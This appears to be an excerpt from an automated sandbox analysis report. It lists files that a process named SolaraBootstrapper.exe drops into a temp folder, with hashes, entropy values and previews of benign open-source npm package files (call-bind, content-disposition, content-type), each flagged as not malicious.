                                                  Preview:MIT License..Copyright (c) 2020 Jordan Harband..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONN
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2026
                                                  Entropy (8bit):5.114140784282728
                                                  Encrypted:false
                                                  SSDEEP:48:11eI4IFO2sfqAy1D0F14m8he5pmNBWdMjChIL0IPIlv:HXFbl1A1ertLLxw1
                                                  MD5:A172C0370CFAD43EE9849484EBCB4BA1
                                                  SHA1:A8353B6E7999E51EDE3D5C7CC5317F75C284B96D
                                                  SHA-256:4F7F28D688EC5FACCE77C190FD90827F923432C1B2D0D2599DF04884F68414EE
                                                  SHA-512:9D92F0D54DE35A45B041D53F1D1FC9BF2AB475626093921950A2C81F052ACC9D0DBEC6F09376DD1386B80F08B4252F0FF6FE024A6F7B4E94A437128E5896AE84
                                                  Malicious:false
                                                  Preview:# call-bind <sup>[![Version Badge][npm-version-svg]][package-url]</sup>..[![github actions][actions-image]][actions-url].[![coverage][codecov-image]][codecov-url].[![dependency status][deps-svg]][deps-url].[![dev dependency status][dev-deps-svg]][dev-deps-url].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url]..[![npm badge][npm-badge-png]][package-url]..Robustly `.call.bind()` a function...## Getting started..```sh.npm install --save call-bind.```..## Usage/Examples..```js.const assert = require('assert');.const callBind = require('call-bind');.const callBound = require('call-bind/callBound');..function f(a, b) {..assert.equal(this, 1);..assert.equal(a, 2);..assert.equal(b, 3);..assert.equal(arguments.length, 2);.}..const fBound = callBind(f);..const slice = callBound('Array.prototype.slice');..delete Function.prototype.call;.delete Function.prototype.bind;..fBound(1, 2, 3);..assert.deepEqual(slice([1, 2, 3, 4], 1, -1), [2, 3]);.```..## Tests..Clon
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):413
                                                  Entropy (8bit):4.865834361159882
                                                  Encrypted:false
                                                  SSDEEP:12:9RQtNVkJicBLj/dXeRtxt/vbZab1ytMIFRp:9GtNVkDBL7VeZxj8AjHp
                                                  MD5:FDA064FEFAEB89252271922954D69A4F
                                                  SHA1:7BAC1561B456A282ABE97CB9BC4E5E0D8A10E769
                                                  SHA-256:2B2FCE7622FDD680256D28BCD59C30913546A825BF69D754D21A1D21CCC2928C
                                                  SHA-512:B0746C9DC90BB513E7D6190470CE0ACBB0C2059B97184B9391F581E9A490729669C8479BA8EAAFC1980F4E058A396BAD11031D048387B5223A7B4B9E6A4B1DAE
                                                  Malicious:false
                                                  Preview:'use strict';..var GetIntrinsic = require('get-intrinsic');..var callBind = require('./');..var $indexOf = callBind(GetIntrinsic('String.prototype.indexOf'));..module.exports = function callBoundIntrinsic(name, allowMissing) {..var intrinsic = GetIntrinsic(name, !!allowMissing);..if (typeof intrinsic === 'function' && $indexOf(name, '.prototype.') > -1) {...return callBind(intrinsic);..}..return intrinsic;.};.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1037
                                                  Entropy (8bit):5.032586686387531
                                                  Encrypted:false
                                                  SSDEEP:24:hKfkGth9cZxghgZuxyU4q+SE9UB8wZ6dAdwBBBq+f7uBK:S9cDbXSgUKwZSzEkuM
                                                  MD5:40109FA1AADE9C89C9587E77011F7301
                                                  SHA1:91F8EAF2FBA5EE5C36E33207FEECEEE846C3E04A
                                                  SHA-256:6B4EA26F8CA351CEE55DA416500FFCA72FDB14EB5909F1512CE8CA68E47D7621
                                                  SHA-512:D308A91B496C9FBD2DB7D8B907D660142172342E990755093D892CF2B8382504119593BB83882F37DB71E925803C37B9B098EDC748F09EB6DC3F84B8DCC28F9B
                                                  Malicious:false
                                                  Preview:'use strict';..var bind = require('function-bind');.var GetIntrinsic = require('get-intrinsic');.var setFunctionLength = require('set-function-length');..var $TypeError = require('es-errors/type');.var $apply = GetIntrinsic('%Function.prototype.apply%');.var $call = GetIntrinsic('%Function.prototype.call%');.var $reflectApply = GetIntrinsic('%Reflect.apply%', true) || bind.call($call, $apply);..var $defineProperty = require('es-define-property');.var $max = GetIntrinsic('%Math.max%');..module.exports = function callBind(originalFunction) {..if (typeof originalFunction !== 'function') {...throw new $TypeError('a function is required');..}..var func = $reflectApply(bind, $call, arguments);..return setFunctionLength(...func,...1 + $max(0, originalFunction.length - (arguments.length - 1)),...true..);.};..var applyBind = function applyBind() {..return $reflectApply(bind, $apply, arguments);.};..if ($defineProperty) {..$defineProperty(module.exports, 'apply', { value: applyBind });.} else {.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2304
                                                  Entropy (8bit):5.108456799286217
                                                  Encrypted:false
                                                  SSDEEP:48:7uhURYCMuUkagS4YhylyRYsEg4lNKrvnTPKsIMoU3wdeSowCL:ACMuDYE3MnTPKYoU3wYZ
                                                  MD5:7327C5E04C116460B3C73EE92292269A
                                                  SHA1:106489D54A0669A5271C89F87F2072CFB8E66C4F
                                                  SHA-256:E8FC7600526CC041BFCD3A562E6CFDB53952A7F7FB4FCC899949E4C51C586155
                                                  SHA-512:93F2327154E59B1F6FA2F55659FD5A8BAE1DA6CB4DC2EA5EF736ED6ABBCBB2840286BE9346BEA22A3DD52371AC842870BD388DCC1E5B673696BC0CAD868422D8
                                                  Malicious:false
                                                  Preview:{.."name": "call-bind",.."version": "1.0.7",.."description": "Robustly `.call.bind()` a function",.."main": "index.js",.."exports": {...".": "./index.js",..."./callBound": "./callBound.js",..."./package.json": "./package.json"..},.."scripts": {..."prepack": "npmignore --auto --commentLines=auto",..."prepublish": "not-in-publish || npm run prepublishOnly",..."prepublishOnly": "safe-publish-latest",..."lint": "eslint --ext=.js,.mjs .",..."postlint": "evalmd README.md",..."pretest": "npm run lint",..."tests-only": "nyc tape 'test/**/*.js'",..."test": "npm run tests-only",..."posttest": "aud --production",..."version": "auto-changelog && git add CHANGELOG.md",..."postversion": "auto-changelog && git add CHANGELOG.md && git commit --no-edit --amend && git tag -f \"v$(node -e \"console.log(require('./package.json').version)\")\""..},.."repository": {..."type": "git",..."url": "git+https://github.com/ljharb/call-bind.git"..},.."keywords": [..."javascript",..."ecmascript",..."es",..."js",..."c
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2349
                                                  Entropy (8bit):4.9384353402173575
                                                  Encrypted:false
                                                  SSDEEP:48:jjgT+XH8urjwT6fH8gxH8TIfH8W5j1kH8TUULgTH8W+gSFMSH8//8vUMeXkMebHm:8+XHXrA6fHTxHAIfHl5iHuUUWHDg5Hgj
                                                  MD5:6C09DA27D70F11BE33C5BC1D70FE5860
                                                  SHA1:B21805BE0C0DB457D1364ABE0103BA75A56FE66F
                                                  SHA-256:67DA6DE7EA66108EA3F035648B367CB8BF7DAC8148B798A54B5B9DE8F7F6EF65
                                                  SHA-512:8DD6654332B5660D787616252CA231283A6406DAE97E8F07E88FFACC2F8A0B38C0BFE1AEE5C5A734B4CB507EA51357CEF2BFE226F4CAB09D57C74D053F80C126
                                                  Malicious:false
                                                  Preview:'use strict';..var test = require('tape');..var callBound = require('../callBound');..test('callBound', function (t) {..// static primitive..t.equal(callBound('Array.length'), Array.length, 'Array.length yields itself');..t.equal(callBound('%Array.length%'), Array.length, '%Array.length% yields itself');...// static non-function object..t.equal(callBound('Array.prototype'), Array.prototype, 'Array.prototype yields itself');..t.equal(callBound('%Array.prototype%'), Array.prototype, '%Array.prototype% yields itself');..t.equal(callBound('Array.constructor'), Array.constructor, 'Array.constructor yields itself');..t.equal(callBound('%Array.constructor%'), Array.constructor, '%Array.constructor% yields itself');...// static function..t.equal(callBound('Date.parse'), Date.parse, 'Date.parse yields itself');..t.equal(callBound('%Date.parse%'), Date.parse, '%Date.parse% yields itself');...// prototype primitive..t.equal(callBound('Error.prototype.message'), Error.prototype.message, 'Error.pro
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3839
                                                  Entropy (8bit):5.047899867943229
                                                  Encrypted:false
                                                  SSDEEP:48:Szw7b+suTX9wDg5JwOhalZw0T9JMXPPPvPBMAZFEqjFEuUcghD7GmypPW:1teXLhalZw0xJMJM6FEUFEvDCNk
                                                  MD5:1D142C2D932051D54112BEA94FF6142A
                                                  SHA1:A1346CE0B0477686C27C61C025285E591A49D95A
                                                  SHA-256:C5CE4BFC6EAC66A6073F5C59868D1E9220C9F4E5CA5033CCFDD2D515D661D13D
                                                  SHA-512:AF5F6F4E40EA030FC645BF1167DDF0157C8AAD1B060DF3A99B1EA322EB4E739E68E67CF9482131E9DA0771BFAA15E4903F696BE8913770C4A9DA589B7734C353
                                                  Malicious:false
                                                  Preview:'use strict';..var callBind = require('../');.var bind = require('function-bind');.var gOPD = require('gopd');.var hasStrictMode = require('has-strict-mode')();.var forEach = require('for-each');.var inspect = require('object-inspect');.var v = require('es-value-fixtures');..var test = require('tape');../*. * older engines have length nonconfigurable. * in io.js v3, it is configurable except on bound functions, hence the .bind(). */.var functionsHaveConfigurableLengths = !!(..gOPD..&& Object.getOwnPropertyDescriptor..&& Object.getOwnPropertyDescriptor(bind.call(function () {}), 'length').configurable.);..test('callBind', function (t) {..forEach(v.nonFunctions, function (nonFunction) {...t['throws'](....function () { callBind(nonFunction); },....TypeError,....inspect(nonFunction) + ' is not a function'...);..});...var sentinel = { sentinel: true };..var func = function (a, b) {...// eslint-disable-next-line no-invalid-this...return [!hasStrictMode && this === global ? undefined : this,
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1020
                                                  Entropy (8bit):4.5877129982951255
                                                  Encrypted:false
                                                  SSDEEP:24:Bcv+MQU7HwJLc0Iwokt4ITWKAG4sEbI8lzd:BCQow0RIrLEI8Zd
                                                  MD5:E8D0052290F58360AB7171937E407618
                                                  SHA1:1DDB50C5AAC3E31107C3D5B245E4910FAB2CB9C9
                                                  SHA-256:A4D8777EEE00A49A897E8ED80B8DEAEE05915106D03A5B652E0ED1CA5BD605FD
                                                  SHA-512:AF3ED543FF9894CE3BE019DE8E88825BF71F167C5714F1DA9F65A9E5C02E6CB63463373C216F492867F0C8574B76DC033B2464EBE1C0F9FB4A75D7106A5B7C41
                                                  Malicious:false
                                                  Preview:0.5.4 / 2021-12-10.==================.. * deps: safe-buffer@5.2.1..0.5.3 / 2018-12-17.==================.. * Use `safe-buffer` for improved Buffer API..0.5.2 / 2016-12-08.==================.. * Fix `parse` to accept any linear whitespace character..0.5.1 / 2016-01-17.==================.. * perf: enable strict mode..0.5.0 / 2014-10-11.==================.. * Add `parse` function..0.4.0 / 2014-09-21.==================.. * Expand non-Unicode `filename` to the full ISO-8859-1 charset..0.3.0 / 2014-09-20.==================.. * Add `fallback` option. * Add `type` option..0.2.0 / 2014-09-19.==================.. * Reduce ambiguity of file names with hex escape in buggy browsers..0.1.2 / 2014-09-19.==================.. * Fix periodic invalid Unicode filename header..0.1.1 / 2014-09-19.==================.. * Fix invalid characters appearing in `filename*` parameter..0.1.0 / 2014-09-18.==================.. * Make the `filename` argument optional..0.0.0 / 2014-09-18.==================..
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1094
                                                  Entropy (8bit):5.1284116326456815
                                                  Encrypted:false
                                                  SSDEEP:24:0iJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:0iJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:13BABC4F212CE635D68DA544339C962B
                                                  SHA1:4881AD2EC8EB2470A7049421047C6D076F48F1DE
                                                  SHA-256:BD47CE7B88C7759630D1E2B9FCFA170A0F1FDE522BE09E13FB1581A79D090400
                                                  SHA-512:40E30174433408E0E2ED46D24373B12DEF47F545D9183B7BCE28D4DDD8C8BB528075C7F20E118F37661DB9F1BBA358999D81A14425EB3E0A4A20865DFCB53182
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2014-2017 Douglas Christopher Wilson..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,.TORT OR OTHERWISE, ARISING
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):5205
                                                  Entropy (8bit):5.075920246999701
                                                  Encrypted:false
                                                  SSDEEP:96:eXCnQ5B17X/AU4M58ZBB/WfUt41lFXTpGa+O/iOu:eyAFXz58ZBMT1l9bru
                                                  MD5:CBD415AE5E4605F9CE13640C323D8AAF
                                                  SHA1:E1D109D584A63DE2418ADFD8FB59B298D0D9368E
                                                  SHA-256:871C5EC648B67AD1A5791C6C4F95E5BB5DF78ECC9AAE0A3387E2A08E068C6968
                                                  SHA-512:4454179D3DDEEB49393DF168DB1867D19054C44B60E1DA5FF5555D26A8F0BA9CC5F3D5DADCE76EBCF0110924C440A10E01969FF701076A38A2FF8673DB6325D9
                                                  Malicious:false
                                                  Preview:# content-disposition..[![NPM Version][npm-image]][npm-url].[![NPM Downloads][downloads-image]][downloads-url].[![Node.js Version][node-version-image]][node-version-url].[![Build Status][github-actions-ci-image]][github-actions-ci-url].[![Test Coverage][coveralls-image]][coveralls-url]..Create and parse HTTP `Content-Disposition` header..## Installation..```sh.$ npm install content-disposition.```..## API..```js.var contentDisposition = require('content-disposition').```..### contentDisposition(filename, options)..Create an attachment `Content-Disposition` header value using the given file name,.if supplied. The `filename` is optional and if no file name is desired, but you.want to specify `options`, set `filename` to `undefined`...```js.res.setHeader('Content-Disposition', contentDisposition('. maths.pdf')).```..**note** HTTP headers are of the ISO-8859-1 character set. If you are writing this.header through a means different from `setHeader` in Node.js, you'll want to specify.the `
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):10594
                                                  Entropy (8bit):5.209240051881824
                                                  Encrypted:false
                                                  SSDEEP:192:NnPSCe5ZBHNVzX1t6/khk3bnEm+4qcVupDAGJvyAJK:NnPSD5ZBttXbMqenircgDAwrK
                                                  MD5:43A307FF7DE26DBEC523EC966C434F94
                                                  SHA1:ED7F187B72A7B1F81D113BAD5AA9347C242120D5
                                                  SHA-256:E86A88A5D1A9DD74FAA753CA4E47A78E38AE930F3206E5E887CF6CB0AD70CBF8
                                                  SHA-512:79C073D3F0DEA6C1606029B9A476CDCE30EBBFB7B6CA95935A2E3F2CC97E70F3F00DBE8B7067BEEA78DAE120F4941E60A7AA26592CFF18E5CDF56F335127092D
                                                  Malicious:false
                                                  Preview:/*!. * content-disposition. * Copyright(c) 2014-2017 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module exports.. * @public. */..module.exports = contentDisposition.module.exports.parse = parse../**. * Module dependencies.. * @private. */..var basename = require('path').basename.var Buffer = require('safe-buffer').Buffer../**. * RegExp to match non attr-char, *after* encodeURIComponent (i.e. not including "%"). * @private. */..var ENCODE_URL_ATTR_CHAR_REGEXP = /[\x00-\x20"'()*,/:;<=>?@[\\\]{}\x7f]/g // eslint-disable-line no-control-regex../**. * RegExp to match percent encoding escape.. * @private. */..var HEX_ESCAPE_REGEXP = /%[0-9A-Fa-f]{2}/.var HEX_ESCAPE_REPLACE_REGEXP = /%([0-9A-Fa-f]{2})/g../**. * RegExp to match non-latin1 characters.. * @private. */..var NON_LATIN1_REGEXP = /[^\x20-\x7e\xa0-\xff]/g../**. * RegExp to match quoted-pair in RFC 2616. *. * quoted-pair = "\" CHAR. * CHAR = <any US-ASCII character (octets 0 - 127)>. * @private. */..var
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1200
                                                  Entropy (8bit):4.797533045353308
                                                  Encrypted:false
                                                  SSDEEP:24:LAXr1C7Fwxwk0nuNAeRIZBYWiRcBjZKly8e1xyy:cRz0nuNAeRIz/Cejojg9
                                                  MD5:5B285D4DB057E7E72225E8E928D2FFA3
                                                  SHA1:1B871FFAEFE2A1FD69AA9B1538B4003BF0EAE9AB
                                                  SHA-256:2459C0E8FBEB5716AB06E9EF73747BBA46ED2BC52E310BD4E9F0EF1F102DA61F
                                                  SHA-512:DFE71AB6BCF40F32A26273A94F11439CBE3066BC3216061EE6EA9737D57B1CABF03A0E45B2FC50C4D0097A27E09197C7FD2B60090A91876671D2C709F31A29A4
                                                  Malicious:false
                                                  Preview:{. "name": "content-disposition",. "description": "Create and parse Content-Disposition header",. "version": "0.5.4",. "author": "Douglas Christopher Wilson <doug@somethingdoug.com>",. "license": "MIT",. "keywords": [. "content-disposition",. "http",. "rfc6266",. "res". ],. "repository": "jshttp/content-disposition",. "dependencies": {. "safe-buffer": "5.2.1". },. "devDependencies": {. "deep-equal": "1.0.1",. "eslint": "7.32.0",. "eslint-config-standard": "13.0.1",. "eslint-plugin-import": "2.25.3",. "eslint-plugin-markdown": "2.2.1",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "5.2.0",. "eslint-plugin-standard": "4.1.0",. "istanbul": "0.4.5",. "mocha": "9.1.3". },. "files": [. "LICENSE",. "HISTORY.md",. "README.md",. "index.js". ],. "engines": {. "node": ">= 0.6". },. "scripts": {. "lint": "eslint .",. "test": "mocha --reporter spec --bail --check-leaks test/",. "test-ci": "istanbul co
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):523
                                                  Entropy (8bit):4.497411680418859
                                                  Encrypted:false
                                                  SSDEEP:12:qX/whj2jbTj9ULZraEosaOQvBWgOT6rBTL:4whj4bvu9+iQBTL
                                                  MD5:34C07BE57678E4FAB909ACB803F60BF3
                                                  SHA1:7849515D1EAE1E583BE632399E4FEC61B1221DA2
                                                  SHA-256:A8B6514926048A9BFAD6C058A3F374797D1A752B47D00B03B34FF61D093A3B5D
                                                  SHA-512:14266B3992794E959E6CED09AEF48912F87A8F59DD6070CECC923D5CA86B9EB4821F2FE5EB5078C01DB832EE9FF58F6CA70AE687A9E1D1DE6144CAFE44A0F6CA
                                                  Malicious:false
                                                  Preview:1.0.5 / 2023-01-29.==================.. * perf: skip value escaping when unnecessary..1.0.4 / 2017-09-11.==================.. * perf: skip parameter parsing when no parameters..1.0.3 / 2017-09-10.==================.. * perf: remove argument reassignment..1.0.2 / 2016-05-09.==================.. * perf: enable strict mode..1.0.1 / 2015-02-13.==================.. * Improve missing `Content-Type` header error message..1.0.0 / 2015-02-01.==================.. * Initial implementation, derived from `media-typer@0.3.0`.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1089
                                                  Entropy (8bit):5.104507231535383
                                                  Encrypted:false
                                                  SSDEEP:24:OiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:OiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:F4B767F006864F81A4901347FE4EFDAB
                                                  SHA1:30FE93B3231DBDB9A122CF57C2C9A2AB28CEF682
                                                  SHA-256:257AED98914108E91A337912727B6A802EEF218248507F74B76FAFFAFF517A38
                                                  SHA-512:91435A4AE76BDE815E951E42663F8B648EB8E525EB5F26F098CBB713D57F25F44760BE3274674DADD4C407F174C5492AAB9B29E805FC24F5E0D3B9DF161DC5E5
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2015 Douglas Christopher Wilson..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,.TORT OR OTHERWISE, ARISING FROM,
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2782
                                                  Entropy (8bit):5.006110544776966
                                                  Encrypted:false
                                                  SSDEEP:48:SdC9zR0HyXKk8TX+xssdczUz4Ulkf24YaAKUxrhJpB1Azj:WCgEKQGUUUCfTHAFM
                                                  MD5:CB19C8ABA870601AEE363AC2302DA33D
                                                  SHA1:F41B2B41F354438D6ED00D1D028B54A93FA15862
                                                  SHA-256:8793880CBC4FD7294DFF8562B71D9381EA1C0557422B66007920415BA439486E
                                                  SHA-512:58991D9DCC472F56D93BF69B65EF6C5D0B1F4AD0A094A812411E75D32ADBE9A54FFB3739DDEB71DCED591BF2BE220740BC17AFF7E9087069C0DCE94A99B3468F
                                                  Malicious:false
                                                  Preview:# content-type..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][npm-url].[![Node.js Version][node-image]][node-url].[![Build Status][ci-image]][ci-url].[![Coverage Status][coveralls-image]][coveralls-url]..Create and parse HTTP Content-Type header according to RFC 7231..## Installation..```sh.$ npm install content-type.```..## API..```js.var contentType = require('content-type').```..### contentType.parse(string)..```js.var obj = contentType.parse('image/svg+xml; charset=utf-8').```..Parse a `Content-Type` header. This will return an object with the following.properties (examples are shown for the string `'image/svg+xml; charset=utf-8'`):.. - `type`: The media type (the type and subtype, always lower case).. Example: `'image/svg+xml'`.. - `parameters`: An object of the parameters in the media type (name of parameter. always lower case). Example: `{charset: 'utf-8'}`..Throws a `TypeError` if the string is missing or invalid...### contentType.pars
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5002
                                                  Entropy (8bit):5.1700954979700535
                                                  Encrypted:false
                                                  SSDEEP:96:CJFvvhHgqZlI8IDzdlalSqZf/gf6GosMySqUqMGa9Nw+j0i8L:CJFHhAqbI8IdUYVhvJMG6Yii
                                                  MD5:4781C7EA0309EDAC61C3A36E3EA9DA10
                                                  SHA1:1B6E7E8D1963CE958CF0F225223FADB5EF12F86D
                                                  SHA-256:7D76AE0F8ECC0A8C053DE97B0F695F3FA3DF33F692D1BD241307995304E5F63D
                                                  SHA-512:D458F8962F44EC30BF519A54AEF063960D9CAC2A954493383FC2EF46781C3244740F18C7DAF1821B4E0BABBD56B356228F7247CE40DE9F3276DE91A71C66C78C
                                                  Malicious:false
                                                  Preview:/*!. * content-type. * Copyright(c) 2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * RegExp to match *( ";" parameter ) in RFC 7231 sec 3.1.1.1. *. * parameter = token "=" ( token / quoted-string ). * token = 1*tchar. * tchar = "!" / "#" / "$" / "%" / "&" / "'" / "*". * / "+" / "-" / "." / "^" / "_" / "`" / "|" / "~". * / DIGIT / ALPHA. * ; any VCHAR, except delimiters. * quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE. * qdtext = HTAB / SP / %x21 / %x23-5B / %x5D-7E / obs-text. * obs-text = %x80-FF. * quoted-pair = "\" ( HTAB / SP / VCHAR / obs-text ). */.var PARAM_REGEXP = /; *([!#$%&'*+.^_`|~0-9A-Za-z-]+) *= *("(?:[\u000b\u0020\u0021\u0023-\u005b\u005d-\u007e\u0080-\u00ff]|\\[\u000b\u0020-\u00ff])*"|[!#$%&'*+.^_`|~0-9A-Za-z-]+) */g // eslint-disable-line no-control-regex.var TEXT_REGEXP = /^[\u000b\u0020-\u007e\u0080-\u00ff]+$/ // eslint-disable-line no-control-regex.var TOKE
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1075
                                                  Entropy (8bit):4.779931444103536
                                                  Encrypted:false
                                                  SSDEEP:12:9X+rQOr18EKiBVgTOmP+zLDWizi1Z0/lWozjktPERGCjPGWdVSYMiP09L6WqLA9c:dEr1X8ynDWiIZ2lWncB0xLvr105P6u
                                                  MD5:0DE0482C40698C075E13E4D54FF34466
                                                  SHA1:1545C6D8538D7E59F375D4AE4B0E0D10471A6C1C
                                                  SHA-256:BD78A5427FFCA1966621301EDC6CAC2146C8C1E137F122161BA90DCA7EC89F77
                                                  SHA-512:9F32408067AFA748AF8D23B4BBBE2657E566017435D4EAD1E63B6D12F8BEBB671EA82353A302340BB6F1CCD4852A3CB8ED340A3A8AF9CD058BD36653B3CD4BCB
                                                  Malicious:false
                                                  Preview:{. "name": "content-type",. "description": "Create and parse HTTP Content-Type header",. "version": "1.0.5",. "author": "Douglas Christopher Wilson <doug@somethingdoug.com>",. "license": "MIT",. "keywords": [. "content-type",. "http",. "req",. "res",. "rfc7231". ],. "repository": "jshttp/content-type",. "devDependencies": {. "deep-equal": "1.0.1",. "eslint": "8.32.0",. "eslint-config-standard": "15.0.1",. "eslint-plugin-import": "2.27.5",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "6.1.1",. "eslint-plugin-standard": "4.1.0",. "mocha": "10.2.0",. "nyc": "15.1.0". },. "files": [. "LICENSE",. "HISTORY.md",. "README.md",. "index.js". ],. "engines": {. "node": ">= 0.6". },. "scripts": {. "lint": "eslint .",. "test": "mocha --reporter spec --check-leaks --bail test/",. "test-ci": "nyc --reporter=lcovonly --reporter=text npm test",. "test-cov": "nyc --reporter=html --reporter=text npm test",.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):29
                                                  Entropy (8bit):3.7454064259382482
                                                  Encrypted:false
                                                  SSDEEP:3:vKXRvRzRxUTj:vQvHWj
                                                  MD5:4F2041BB781C6E873AEB359EF4B191D4
                                                  SHA1:3CD6EDF0E8ECB60C8C6E8CBE76CD358712504D57
                                                  SHA-256:083B765409C2FE14FA2382834CCCF719BFCDBC2FF9A90BE37D229038E1D0EEAE
                                                  SHA-512:ABEEDD26DB3989B8442C520619EF6EFB70880AAF489265849571B16E78E0BD34426BB73EFD85E291CF0B50C77E87E6E3414C28FEE6DDD4E1083F564A5811AD97
                                                  Malicious:false
                                                  Preview:support.test.examples.*.sock.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):695
                                                  Entropy (8bit):4.669112136603317
                                                  Encrypted:false
                                                  SSDEEP:12:lRn8w1XA35w4xvlO5ifHQBn9Uf91fUecIJ9QmJBY:lx8kKw4xvqiYBnu7fSgg
                                                  MD5:DC394515CE0AD9E572ACAB06C54847CA
                                                  SHA1:0EE29A80F02F08D73342842376E27BC3B7F7D3DB
                                                  SHA-256:8BDE8405601443BD5186594728B3DC538B50CB5B0F283E26D1DE9B23D976ABFA
                                                  SHA-512:7FEFC0A3C3825809696F3F00D9B0D023CEEC0731BC4FCA42797BB458039EC00563D41D621AE4EF8F5E15FC8FE4E7F3A174ABB9C47C3FD9EDCDAA5390DDB1F8EA
                                                  Malicious:false
